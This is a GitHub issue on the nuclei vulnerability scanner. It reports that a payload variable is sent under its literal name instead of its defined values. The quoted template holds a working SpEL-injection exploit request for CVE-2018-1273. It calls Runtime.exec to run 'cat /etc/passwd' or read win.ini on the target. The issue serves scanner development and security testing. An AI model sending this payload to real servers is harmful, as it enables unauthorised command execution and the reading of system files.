### ISSUE TITLE
[issue] An unexpected payload requests

### ISSUE THREAD

**Issue by dwisiswant0** [projectdiscovery/nuclei#336]
**Describe the bug**

An unexpected request when I define a constant payload instead sends a payload request with a variable name which it shouldn't.

Template:
```yaml
  - payloads:
      command:
        - "cat /etc/passwd"
        - "type C:\\/Windows\\/win.ini"
    raw:
      - |
        POST /account HTTP/1.1
        Host: {{Hostname}}
        Connection: close
        Content-Type: application/x-www-form-urlencoded

        name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('{{url_encode('command')}}')]=nuclei
```

Screenshots attached below.

**Nuclei version**
`v2.1.1`

**Screenshot of the error or bug**

> Usage consumed:
> \> nuclei -t cves/CVE-2018-1273.yaml -target http://localhost -proxy-url http://localhost:8080

### 1) First
![Screenshot_2020-10-01_09-37-36](https://user-images.githubusercontent.com/25837540/94759477-386ee180-03ca-11eb-902f-8aeb2e1363fb.png)

### 2) It should be last...
![Screenshot_2020-10-01_09-38-08](https://user-images.githubusercontent.com/25837540/94759502-4fadcf00-03ca-11eb-8a94-af0c80ef961b.png)

### 3) But, unexpected request sent:
![Screenshot_2020-10-01_09-38-34](https://user-images.githubusercontent.com/25837540/94759531-66ecbc80-03ca-11eb-9359-b3ced9612414.png)
